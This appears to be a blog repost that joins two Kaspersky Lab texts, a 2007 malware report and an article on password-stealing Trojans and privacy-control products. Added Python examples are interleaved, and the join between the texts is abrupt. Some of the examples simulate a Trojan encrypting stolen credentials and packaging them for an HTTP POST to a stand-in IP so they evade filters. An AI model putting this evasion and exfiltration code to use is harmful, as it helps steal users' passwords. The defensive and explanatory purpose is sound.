Estonian politicians blamed the Russian special services for the attacks. This was the first time that the word "cyberwar" was used by such highly placed officials. Estonia asked NATO to view the cyber attacks as military action and ultimately requested military protection from threats stemming from the Internet.
What happened on the Russian Internet during this period? As soon as skirmishes between protesters and the police began in Estonia, many Russian Internet users took the only opportunity they had to voice their protest against the actions of the Estonian government - an online protest. This took the form of DoS attacks. A number of different programs began to appear on forums and websites, and they were used to send innumerable requests to Estonian websites. Any person could download this kind of program and launch it on their own computer. In technical terms, this creates a botnet. However, this botnet was constructed with the consent of computer owners who knew what they were doing. Of course, some of these attacks were sent from “real” botnets from previously infected machines, but one should not underestimate the power of this 'manual' attack. If such events can be called a cyberwar, then in this case the war involved guerilla combat.
There was no substantial evidence for the participation of Russian government bodies in these attacks. However, now the problems of cyberwar and cyber terrorism are being discussed round the world, and not just by security professionals, but also by politicians and military experts. Cyber terrorism is clearly not being discussed in ways appropriate to the current situation: too much dangerous information is being published, and readers are offered ready-made cyber terrorist scenarios. Kaspersky Lab has always held the opinion that the publication and discussion of different ways to bring down a target cannot be described as anything but reprehensible. There is no doubt that any such information could provoke certain extremist groups to attempt to spark off a similar scenario. And now Pandora’s box has been opened.
The biggest global event in the cell phone industry in the second quarter of 2007, and probably of the entire year, was the release of Apple's new iPhone. Sales are predicted to reach 13.5 million units over the first 18 months. Will the iPhone's popularity act as a tipping point, upsetting the stagnant status quo in the world of mobile viruses? According to our estimates, 2008 is the year in which virus problems for the iPhone can be expected to become a reality. Malicious programs for the iPhone probably won't be worms. Instead, they will probably be typical file viruses and a variety of Trojans. But the biggest threat for iPhone users will be the various vulnerabilities that could be used by malicious users to access information stored on the phone.
Mpack. The authors of malicious programs have begun giving preference to using various vulnerabilities in order to penetrate systems. In mid-June this year, over six thousand Italian servers were detected with websites that included a few strings of malicious html, similar to:
This is a typical construction used to exploit a range of browser vulnerabilities and Kaspersky Lab analysts have been very familiar with it for a number of years now. What happens, and how? There is a certain bundle of exploits that take advantage of the vulnerabilities in popular web browsers and operating systems. Malicious users post these exploits on their own website. In order to attract users to visit the site, they gain access to other websites, usually by using account access information that was previously stolen by a Trojan. Then, the iframe tag is added to all of these sites. The tag leads back to the infected site with the exploits. In the end, a Trojan Downloader is usually installed on the system under attack, which makes it possible to download more viruses, worms, backdoors, spyware, etc to the victim machine.
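The injected iframe described above is easy to spot if one knows what to look for: a frame with zero or one-pixel dimensions, or hidden by style, whose source points off-site. The following example (added here; not code from the report, and the sample page and hostnames are constructed) scans a page for such frames and rates same-origin hidden frames lower, since legitimate sites do use them.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed page: one legitimate video embed and two hidden frames, one of
# them pointing at a bare IP in the way the injected Mpack frames did.
SAMPLE_PAGE = """
<html><body>
<h1>Welcome</h1>
<iframe src="https://video.example.com/embed/42" width="640" height="360"></iframe>
<p>Latest news...</p>
<iframe src="http://203.0.113.5/in.cgi?7" width="0" height="0" frameborder="0"></iframe>
<iframe src="/local/widget.html" style="display:none"></iframe>
</body></html>
"""


class IframeCollector(HTMLParser):
    """Collect the attributes of every <iframe> start tag."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            # attributes without a value arrive as None
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})


def _is_hidden(attrs):
    """Zero/one-pixel geometry or CSS hiding: the usual ways an injected
    frame is kept out of the visitor's sight."""
    def tiny(v):
        v = v.strip().lower().rstrip("px").strip()
        return v.isdigit() and int(v) <= 1
    if tiny(attrs.get("width", "")) or tiny(attrs.get("height", "")):
        return True
    style = attrs.get("style", "").replace(" ", "").lower()
    return "display:none" in style or "visibility:hidden" in style


def suspicious_iframes(html, page_host):
    """Return hidden iframes with the host they load from and a severity.

    page_host is the host the page was fetched from. A hidden frame loading
    from another host (or a bare IP) is rated "high"; a hidden same-origin
    frame is rated "low" and left to the analyst.
    """
    p = IframeCollector()
    p.feed(html)
    findings = []
    for f in p.iframes:
        if not _is_hidden(f):
            continue
        src = f.get("src", "")
        host = urlparse(src).hostname or page_host   # relative src = same origin
        severity = "high" if host != page_host else "low"
        findings.append({"src": src, "host": host, "severity": severity})
    return findings


if __name__ == "__main__":
    for hit in suspicious_iframes(SAMPLE_PAGE, "www.example-site.it"):
        print(hit)
```

A production scanner would also resolve the frame's URL against the page URL and follow the chain to see what the frame actually serves, but the attribute check alone already catches the injection pattern described in the report.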
We were surprised that Mpack made it beyond the borders of Russia and was used in Italy. Here's why: Mpack was created in Russia and was sold by Russian hackers to other Russian hackers. Its authors have been very active in creating and supporting the spread of the Trojan LdPinch. There are several other similar exploit bundles on the black market: Q406 Roll-up package, MDAC, WebAttacker, etc. All of these analogues have better 'success' rates when it comes to infecting systems than Mpack does.
We believe that the biggest problem is that it is extremely difficult to hold the authors of Mpack criminally responsible. They simply take exploits which were identified by other people and then published on IT security websites in the interests of improving security, but they take no responsibility for how these exploit bundles will be used. This is where we come to the age-old question: does disclosing information about vulnerabilities do more harm than good? We promise to return to this issue and voice our views on what’s going on today in terms of blackhat vs. whitehat.
In mid May we detected three variants of a new Trojan for cell phones: Trojan-SMS.SymbOS.Viver. This Trojan sends text messages to premium numbers. As a result, the subscriber who falls victim is charged a certain amount of money which is then transferred to the malicious user's account. In May we registered three such incidents, which just goes to show once again that today’s mobile technologies are continuing to attract the interest of cyber criminals. Unfortunately, we do not have statistics for most other countries, but it’s difficult to believe that this is an exclusively Russian problem.
The key events of the second quarter discussed in this report are certainly food for thought, but they still do not answer the question: what is the next step for viruses and information threats? Despite the emergence of new operating systems (such as Windows Vista), new services (mobile content) and devices (the iPhone), cyber criminals continue to lack initiative and are using tried and tested ways of attacking Internet users. Furthermore, we are seeing a significant return to “the sources”: computers are increasingly the targets of DDoS attacks and attacks that use browser vulnerabilities to penetrate the system. Probably the only thing that distinguishes the present from three years ago is the fact that email is not being used as the primary vehicle for spreading viruses. Instead, instant messaging services are one of today’s key means of distribution. Another difference is that there has been an explosive increase in Trojans targeting the users of online games. The threats are not becoming “smarter.” Innovation has stagnated as development is now focused on cosmetic changes, and we still don't know what may ultimately serve as a catalyst for global changes to the virus landscape in the near future.
Antivirus companies have considerably improved their technologies and introduced several new technologies. Presently, antivirus company clients are protected much more effectively than two years ago. The average time that most new malicious programs survive in the wild has been cut down to a number of hours, and is rarely ever counted in days anymore.
But let's predict what will happen next. Malicious users will attempt to reach beyond the protection offered by antivirus solutions. This is a shift from "getting around" antivirus programs, and implies more activity in fields that have not yet been mastered by quality antivirus protection, or areas in which protection is not an option for any number of reasons. This is more than likely where the new front will be in the information war: online games, blogs, instant messaging and file swapping networks.
Saving your private RYAN against A smart Virus>
Classifying methods used to steal data
The United States Federal Trade Commission (FTC) views the issue of the theft of confidential data in the broadest sense. Their website provides information about many traditional "non-computerized" means of stealing information, such as stealing wallets and purses, searching through shredded papers that have been thrown in the garbage, making calls allegedly from a financial institution, and using special devices to scan credit card numbers, to name a few.
However, in addition to all these techniques, there are other ways of stealing information. There are at least three different ways to steal data using a computer. The first is when the computer user voluntarily gives information to a malicious user, having trusted a false request for said information. These requests usually come in the form of mass mailings. The malicious user will have created a false website that imitates the site of an actual bank or other financial organization. This kind of computer crime is called phishing.
The second way to steal confidential information involves tracking and logging a user's actions. This kind of electronic espionage is carried out using Trojans which Kaspersky Lab classifies as Trojan-Spy programs. One of the most popular kinds of Trojan-Spy program is the keylogger, covered in detail in a previous article.
The third technique for stealing confidential data involves the use of malicious programs (most often Trojans) to search for confidential information on a user's computer and then transmit this data to a malicious user. In this case, a malicious user can only receive data that the user considered important enough to store on the computer. However, this seeming drawback is compensated for by the fact that the data is transmitted without user participation. For more details about this technique, see: http://www.viruslist.com/en/virusesdescribed?chapter=152540521.
These malicious programs can spread in a number of ways: they can be activated when an email attachment is opened or when a user clicks on a link sent via instant messaging. They can also launch when a file is opened from a directory on a peer-to-peer network or by using scripts on a website that take advantage of idiosyncrasies in web browsers, making it possible for these programs to launch automatically when users visit these sites. Such programs can also be spread via other previously installed malicious programs that are capable of downloading and installing them to the system.
Malicious programs like PSW Trojans are designed to access a range of information about the system, the user and passwords to a number of programs and operating system services. In order to do this, they scan all storage areas which contain relevant data: Windows protected storage, registry keys and certain program files of interest to a malicious user (usually instant messaging clients, email systems and Internet browsers).
After gathering data, the Trojan will usually encrypt it and compress it into a small binary file. Later, the file may be sent via email or placed on the malicious user's FTP server.
The way in which the abovementioned malicious programs function is covered in detail in "Computers, Networks and Theft", which examines two different techniques used by modern security solutions to protect confidential data.
How do today's products protect confidential data?
Almost all modern security solutions (such as Security Suite) include a component which protects confidential data, typically called Privacy Control. (In some applications, this component is combined with other security components, such as an anti-phishing component.) The key purpose of this component is to protect confidential information on the user's computer against unauthorized access and transmission.
Let’s take a look at how Symantec products implement protection for confidential data. This company was chosen because they were one of the first to implement protection for confidential data in their products, before other market players followed suit and added their own, similar components.
Back in late 1999, Symantec published information about their new product, Norton Internet Security 2000. This featured the new Norton Privacy Control, with one of its key modules being Confidential Data Blocking.
This component works in the following way:
the user must enter all data he considers confidential,
the product will then analyze all outgoing traffic from the user’s computer and either "cut up" all outgoing confidential data, or substitute it with meaningless symbols (such as “*”).
Figure 1. Norton Internet Security 2000 Confidential Data component
Norton’s Privacy Control component is included in new Norton products, such as Norton Personal Firewall and Norton Internet Security.
The company’s latest flagship product is Norton360, which was released by Symantec in 2007. The Privacy Control component is also included in Norton360, but not in the regular package. Instead, it comes as an Add-on Pack which can be downloaded from Symantec's official website.
Figure 2. Norton360 Confidential Data Blocking component
The main idea behind the product remains unchanged: just as Norton Internet Security 2000, it uses a table into which the user is meant to enter his confidential data (see figure 2).
Drawbacks in traditional approaches to protecting confidential data
What made the program’s developers decide to remove the Confidential Data protection component from the list of standard Norton360 modules? There are probably several reasons, but one stands out in particular. The truth is that this approach to protecting confidential information is not effective ─ it only creates the illusion of security.
Some official descriptions of the latest version of Norton Internet Security say that it "blocks […] transmitting unauthorized information''. However, this is not actually the case.
If you look carefully at the first window in Figure 2, you can see a note in the lower half of the window: "Norton Add-on Pack cannot block confidential information on secure Web sites. However, secure Web sites already ensure your data is safe." The reason for this note is simple: data exchange with secure websites is encrypted, which makes it impossible for any third party, the protection component included, to analyze the data transmitted.
A confidential data protection component should protect users from Trojans like PSW Trojans. What prevents a Trojan from encrypting all data being transmitted? Nothing, actually, and over 80% of Trojans do just that. That is why the confidential data protection component - which is based on traffic analysis and searching for previously entered data sequences - is not capable of preventing data from being sent out in most cases, since it simply will not find the data once it has been encrypted by a Trojan.
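The weakness of matching outbound traffic against a table of user-entered secrets can be shown in a few lines. The following example (added here; it is not code from the article or from Symantec) implements a masking filter of the kind described for Norton's Confidential Data Blocking, applies it to a constructed Trojan report sent in clear, and then to the same report after the Trojan XOR-encrypts and base64-wraps it. The "card number" and "mail password" are made up.

```python
import base64

# Constructed confidential data table of the kind the user is asked to fill in.
CONFIDENTIAL = ["4111111111111111", "sesame42"]  # made-up card number and mail password


def mask_outgoing(payload: bytes, secrets) -> bytes:
    """Traffic-analysis control: replace every occurrence of a stored secret
    in an outbound buffer with asterisks, as the Norton component does."""
    for s in secrets:
        payload = payload.replace(s.encode(), b"*" * len(s))
    return payload


def trojan_exfil_plain(stolen: dict) -> bytes:
    """Naive Trojan: sends the harvested key=value pairs in clear."""
    return "&".join(f"{k}={v}" for k, v in stolen.items()).encode()


def xor_stream(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR: weak as cryptography, but enough to hide the
    plaintext from a string-matching filter."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def trojan_exfil_encrypted(stolen: dict, key: bytes = b"k3y") -> bytes:
    """Typical Trojan: same report, XOR-encrypted and base64-wrapped before it
    leaves the host."""
    return base64.b64encode(xor_stream(trojan_exfil_plain(stolen), key))


def attacker_decode(wire: bytes, key: bytes = b"k3y") -> bytes:
    """What the operator does at the other end."""
    return xor_stream(base64.b64decode(wire), key)


def leaked(wire: bytes, secrets) -> bool:
    """Did any secret cross the wire in a form the filter could have matched?"""
    return any(s.encode() in wire for s in secrets)


if __name__ == "__main__":
    stolen = {"cc": CONFIDENTIAL[0], "pop3": CONFIDENTIAL[1]}
    print("clear  :", mask_outgoing(trojan_exfil_plain(stolen), CONFIDENTIAL))
    wire = mask_outgoing(trojan_exfil_encrypted(stolen), CONFIDENTIAL)
    print("encoded:", wire, "-> recovered:", attacker_decode(wire))
```

The filter does its job on the clear-text report and does nothing at all to the encoded one; the operator recovers every byte. This is exactly why the component had to carry the note about secure websites, and why it offers no real defence against a Trojan.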
Furthermore, storing all your confidential information in one place after entering the data in windows like the ones in Figure 2 cannot do anything to increase security. On the contrary, instead of having to search through all kinds of data in several places on a computer's file system, a malicious user knows right where to go and all he has to do is gain access to the file used by the protection component. There is no doubt that developers do everything they can to secure the data entered by the user, but security cannot be guaranteed.
An example of how this component works is as follows: if a webpage asks you to enter your telephone number, Norton Internet Security 2000 will ask you if you are sure that you want to send this confidential data after you have entered it into the text field. However, that warning is not especially helpful in real life, since the user decision to enter the requested information is based on whether or not s/he trusts the website. If the user believes the website is authentic, then the program warning will not stop the user from entering data. If the user believes the website is fraudulent, then he will not bother to enter any data in the first place.
Unfortunately, today there are more and more fraudulent websites designed by malicious users to look very similar to the official websites of financial institutions, and users willingly enter their confidential data despite security solution warnings.
An alternative approach to protecting confidential data
There is another approach to protecting confidential data based on blocking the actions of malicious programs at earlier stages, before data is transmitted, and before it is too late.
In order to steal confidential information, a malicious program must take two actions: find the information and extract it from wherever it is being stored (that could be a file, a registry key, or an operating system's special storage area) and transmit it to the author of the malicious program via specific channels. Since many computers already have firewalls installed which control the network activity of applications on the computer, the malicious program cannot transmit any collected data under its own name. That is why many PSW Trojans use different tactics to evade firewall protection, making them able to send data without the user's knowledge.
It should then follow that the protection component should track the activity of applications when that activity is indicative of a potential attempt to steal confidential information:
An attempt to gain access to personal data or passwords located in Microsoft Windows’ Protected Storage.
This service is used to store confidential data, such as local passwords, passwords for POP and SMTP email servers, Internet access passwords, passwords for automatic access to closed website sections, other Internet data and passwords for automatically filling out Internet forms, and other information. These data are entered into the relevant text field of email clients and web browsers. As a rule, the user may store the entered data; in order to do so, he needs to mark it with a special flag. In this case, the data that is entered is stored in Microsoft Windows Protected Storage.
Even users who are concerned about information leaks and do not save passwords or other data in their Internet browser usually save their email passwords, since entering their password each time they receive or send something is too time consuming. Since many Internet providers use the same password for email and for Internet access, obtaining this password will give a malicious user access to both the email account and the Internet connection settings.
Attempts to send data stealthily.
In order to transmit the data it has collected, a malicious program will try different tactics to get around a firewall if one is installed on the victim computer. For example, it may stealthily launch an Internet browser process and transmit data using program interfaces common to most browsers (COM, OLE, DDE and others). Since most modern firewalls have a set of pre-installed settings that permit network activity for trusted applications, the firewall will not react to the transmission of data by the Internet browser and the user will not be aware of this activity nor will he be able to prevent the data leak.
When using this approach, encryption of stolen data by a malicious program is not a problem, as the malicious program's payload will be blocked before encrypted information can be transmitted.
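The following is an added example, not code from the article or from Kaspersky Internet Security, showing what a behaviour-based monitor for the two indicators above looks like in Python. It keys on the real Protected Storage API names (PStoreCreateInstance and the IPStore methods) and registry hive, and on the InternetExplorer.Application COM ProgID and browser DDE service names; the event format, the allow-lists, the process name pinch_sample.exe and the whole trace are constructed for illustration, and a real monitor would obtain such events from API hooks or a kernel driver.

```python
"""Behaviour-based detection of the two indicators described above: a process
reading Microsoft Protected Storage, and a process driving a trusted browser
to transmit data on its behalf.  Added example; not code from the article or
from Kaspersky Internet Security.  The event format, the process names and the
trace below are constructed for illustration; a real monitor would obtain such
events from API hooks or a kernel driver."""
from dataclasses import dataclass, field

# Real Protected Storage entry points (pstorec.dll) and the registry hive the
# service persists to; a hooking monitor keys on these.
PSTORE_APIS = {"PStoreCreateInstance", "IPStore::EnumItems", "IPStore::ReadItem"}
PSTORE_REG_PREFIX = r"HKCU\Software\Microsoft\Protected Storage System Provider"

# Browser automation surfaces: the IE COM ProgID and the DDE service names
# browsers register for WWW_OpenURL (assumed set; extend for other browsers).
BROWSER_COM_PROGIDS = {"InternetExplorer.Application"}
DDE_BROWSER_SERVICES = {"IExplore", "Firefox", "Opera"}

# Processes that legitimately own Protected Storage data, and the browsers
# whose network activity the firewall already trusts (assumed allow-lists).
PSTORE_OWNERS = {"iexplore.exe", "msimn.exe", "outlook.exe"}
BROWSERS = {"iexplore.exe", "firefox.exe", "opera.exe"}


@dataclass
class Event:
    pid: int
    image: str      # image name of the acting process
    kind: str       # api | registry | com_create | dde | process_create | network
    target: str     # API name, registry path, ProgID, DDE service, child image or peer
    args: dict = field(default_factory=dict)


@dataclass
class Alert:
    pid: int
    image: str
    rule: str       # protected_storage_access | stealth_send_via_browser
    detail: str


def detect(events):
    """Return one Alert per suspicious event.  A browser launched without a
    window by a non-browser is remembered so that its later network activity
    is attributed to the parent that launched it."""
    alerts = []
    hidden_children = {}    # child pid -> (parent pid, parent image)
    for ev in events:
        img = ev.image.lower()
        if ev.kind == "api" and ev.target in PSTORE_APIS and img not in PSTORE_OWNERS:
            alerts.append(Alert(ev.pid, img, "protected_storage_access", f"called {ev.target}"))
        elif ev.kind == "registry" and ev.target.startswith(PSTORE_REG_PREFIX) and img not in PSTORE_OWNERS:
            alerts.append(Alert(ev.pid, img, "protected_storage_access", f"read {ev.target}"))
        elif ev.kind == "com_create" and ev.target in BROWSER_COM_PROGIDS and img not in BROWSERS:
            alerts.append(Alert(ev.pid, img, "stealth_send_via_browser", f"instantiated {ev.target}"))
        elif ev.kind == "dde" and ev.target in DDE_BROWSER_SERVICES and img not in BROWSERS:
            alerts.append(Alert(ev.pid, img, "stealth_send_via_browser",
                                f"DDE {ev.args.get('topic')} to {ev.target}"))
        elif ev.kind == "process_create" and ev.target.lower() in BROWSERS and img not in BROWSERS:
            if ev.args.get("hidden"):       # SW_HIDE: the user never sees the window
                hidden_children[ev.args["child_pid"]] = (ev.pid, img)
                alerts.append(Alert(ev.pid, img, "stealth_send_via_browser",
                                    f"launched {ev.target} with no window"))
        elif ev.kind == "network" and ev.pid in hidden_children:
            ppid, pimg = hidden_children[ev.pid]
            alerts.append(Alert(ppid, pimg, "stealth_send_via_browser",
                                f"hidden {img} (pid {ev.pid}) connected to {ev.target}"))
    return alerts


def summarize(alerts):
    """Map each offending pid to the sorted list of rules it triggered."""
    rules = {}
    for a in alerts:
        rules.setdefault(a.pid, set()).add(a.rule)
    return {pid: sorted(r) for pid, r in rules.items()}


# Constructed trace: benign activity by the data's owners and by a user-driven
# browser, followed by a hypothetical LdPinch-style sample (pinch_sample.exe).
SAMPLE_TRACE = [
    Event(100, "iexplore.exe", "api", "PStoreCreateInstance"),
    Event(120, "outlook.exe", "registry", PSTORE_REG_PREFIX + r"\Data"),
    Event(200, "winword.exe", "process_create", "firefox.exe", {"child_pid": 201, "hidden": False}),
    Event(201, "firefox.exe", "network", "www.example.org:80"),
    Event(300, "pinch_sample.exe", "registry", PSTORE_REG_PREFIX + r"\Data"),
    Event(300, "pinch_sample.exe", "api", "PStoreCreateInstance"),
    Event(300, "pinch_sample.exe", "com_create", "InternetExplorer.Application", {"visible": False}),
    Event(300, "pinch_sample.exe", "process_create", "iexplore.exe", {"child_pid": 301, "hidden": True}),
    Event(301, "iexplore.exe", "network", "203.0.113.5:80"),
]

if __name__ == "__main__":
    for a in detect(SAMPLE_TRACE):
        print(f"pid {a.pid} {a.image}: {a.rule} - {a.detail}")
    print(summarize(detect(SAMPLE_TRACE)))
```

Only the constructed sample trips either rule: the browser and mail client touch Protected Storage because they own the data, and Word launching a visible Firefox is an ordinary user action, so neither produces an alert. Note that the monitor never looks at the bytes on the wire, which is why encryption of the stolen data makes no difference to it.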
This approach is implemented in Kaspersky Internet Security 7.0.
Trojan-PSW.Win32.LdPinch: how KIS 7.0 protects against the theft of confidential data
Kaspersky Internet Security 7.0 includes a confidential data protection module, one of the subsystems of its Anti-Spyware component (see Figure 3). It analyzes the behavior of all processes on the user's system and, if it detects either of the two types of action described above, either warns the user or blocks the action automatically.
Figure 3. Configuring Kaspersky Internet Security 7.0 Anti-Spyware component
Let’s examine how this KIS module protects users against attempts to steal confidential data using Trojan-PSW.Win32.LdPinch as an example. This Trojan's main goal is to steal passwords from a range of applications installed on a user's computer.
As the virus description shows, Trojan-PSW.Win32.LdPinch collects information about the computer's hard drive and the amount of free space remaining on it, the current user, the computer's network name, the version of the operating system, the processor type, the monitor specifications, the installed applications, the running processes and any existing dial-up connections. Most of what it steals, however, consists of passwords for a wide range of programs, including the following:
instant messaging clients:
ICQ 99B-2002a
ICQ 2003/Lite/5/Rambler
Miranda IM
TRILLIAN
&RQ, RnQ, The Rat
QIP
GAIM
MSN & Live Messenger
email clients:
The Bat!
MS Office Outlook
Mail.Ru Agent
Becky
Eudora
Mozilla Thunderbird
Gmail Notifier
Internet browsers:
Opera
Protected Storage (IE, Outlook Express)
Mozilla Browser
Mozilla Firefox
automatic dialers:
RAS
E-DIALER
VDialer
file managers:
FAR
Windows/Total Commander
FTP clients:
CuteFTP
WS FTP
FileZilla
Flash FXP
Smart FTP
Coffee Cup FTP
and many others.
Stolen passwords are used to further spread malicious programs. Once a password for an ICQ client is obtained, for example, the Trojan will modify this password on the ICQ website and begin sending messages with a link to its own executable file from the victim’s account in an attempt to infect as many machines as possible.
All stolen data is encrypted and sent either to a specific email address or placed on the malicious user's FTP server.
Confidential data protection systems which analyze traffic (such as Norton Privacy Control) cannot prevent encrypted data from being sent, even if the user enters every password for every program into the list of monitored data. That means that if a user has installed a Symantec product with Privacy Control, or any other product that uses the same approach to protecting confidential information, the computer may still be compromised by a new version of Trojan-PSW.Win32.LdPinch that is not yet in the antivirus database and is not recognized by any other security component. As a result, most of that user's passwords will be stolen and then used by cybercriminals as they see fit.
A protection system which analyzes application activity, by contrast, blocks both the harvesting (see Figure 4) and the stealthy transmission (see Figure 5) of confidential data by Trojan-PSW.Win32.LdPinch.
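To make the limitation concrete, here is an added Python example (not code from the article or from any Symantec or Kaspersky product) that models a traffic-based privacy control as a search of outbound bytes for a user-supplied list of secrets, including after the reversible encodings such a filter can cheaply undo, and runs it against three versions of the same stolen report: sent in the clear, base64-wrapped, and encrypted. The harvested credentials, the toy stream cipher, the C&C address and the HTTP report format are all constructed for illustration, and the model of the filter is an assumption about how such products work rather than a description of any particular one.

```python
"""Why a traffic-analysis privacy control (a user-supplied list of secrets
matched against outbound data) misses encrypted exfiltration.  Added example;
not code from the article or from any Symantec or Kaspersky product.  The
harvested credentials, the toy stream cipher, the C&C address and the HTTP
report format are all constructed for illustration."""
import base64
import binascii
import hashlib
import re
import urllib.parse

# What the Trojan harvested (constructed) and what the user typed into the
# privacy control's list of monitored data.
HARVESTED = {"icq_pass": "hunter2", "pop3_pass": "s3cretP0p"}
MONITORED = ["hunter2", "s3cretP0p"]


def outbound_contains_secret(payload: bytes, secrets) -> list:
    """Model of a traffic-based filter: search the outbound bytes for each listed
    secret, as sent and after the reversible encodings a monitor can cheaply
    undo (URL-encoding and base64 runs).  Returns the secrets it recognised."""
    views = [payload, urllib.parse.unquote_to_bytes(payload)]
    for run in re.finditer(rb"[A-Za-z0-9+/=]{16,}", payload):
        try:
            views.append(base64.b64decode(run.group(), validate=True))
        except binascii.Error:
            pass
    return [s for s in secrets if any(s.encode() in v for v in views)]


def stream_xor(key: bytes, data: bytes) -> bytes:
    """Toy stream cipher (keystream = SHA-256(key || counter)), standing in for
    whatever cipher a real PSW Trojan ships with.  Symmetric: applying it twice
    with the same key restores the plaintext."""
    keystream = b""
    counter = 0
    while len(keystream) < len(data):
        keystream += hashlib.sha256(key + counter.to_bytes(4, "big")).digest()
        counter += 1
    return bytes(a ^ b for a, b in zip(data, keystream))


def http_post(body: bytes) -> bytes:
    """Wrap a report in the kind of POST a hidden browser would send (constructed)."""
    return (b"POST /r.php HTTP/1.1\r\nHost: 203.0.113.5\r\n"
            b"Content-Type: application/x-www-form-urlencoded\r\n"
            b"Content-Length: %d\r\n\r\n" % len(body)) + body


def report() -> bytes:
    return urllib.parse.urlencode(HARVESTED).encode()


def exfil_plain() -> bytes:
    return http_post(report())


def exfil_base64() -> bytes:
    return http_post(base64.b64encode(report()))


def exfil_encrypted(key: bytes = b"pinch-key") -> bytes:
    return http_post(base64.b64encode(stream_xor(key, report())))


if __name__ == "__main__":
    for name, wire in (("plain", exfil_plain()), ("base64", exfil_base64()),
                       ("encrypted", exfil_encrypted())):
        print(f"{name:10s} -> filter matched {outbound_contains_secret(wire, MONITORED)}")
```

The filter catches the report sent in the clear and even the base64-wrapped one, because those transformations are reversible without a key. Once the Trojan applies any keyed cipher before transmission, the bytes on the wire no longer contain the monitored strings in any form the filter can recover, so the same list of secrets matches nothing and the leak goes through.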
Figure 4. Kaspersky Internet Security 7.0 warns of Trojan-PSW.Win32.LdPinch attempting to gain access to confidential data
Figure 5. Kaspersky Internet Security 7.0 warns of Trojan-PSW.Win32.LdPinch attempting to transmit confidential data secretly
Conclusion
This article has classified the methods malicious users employ to steal information from a computer and analyzed two fundamentally different techniques for building the modules that protect confidential data in contemporary security solutions. It has also compared the effectiveness of the two approaches, using a widely known Trojan as an example.
The comparison shows that the technique based on analyzing application activity that could indicate an attempt to steal confidential data has major advantages. The approach based on a user-created list of secrets to watch for in outbound traffic is less effective, since it is much harder to guarantee that no part of that list ever leaves the computer in a form the monitor can recognize.
Saturday, June 7, 2008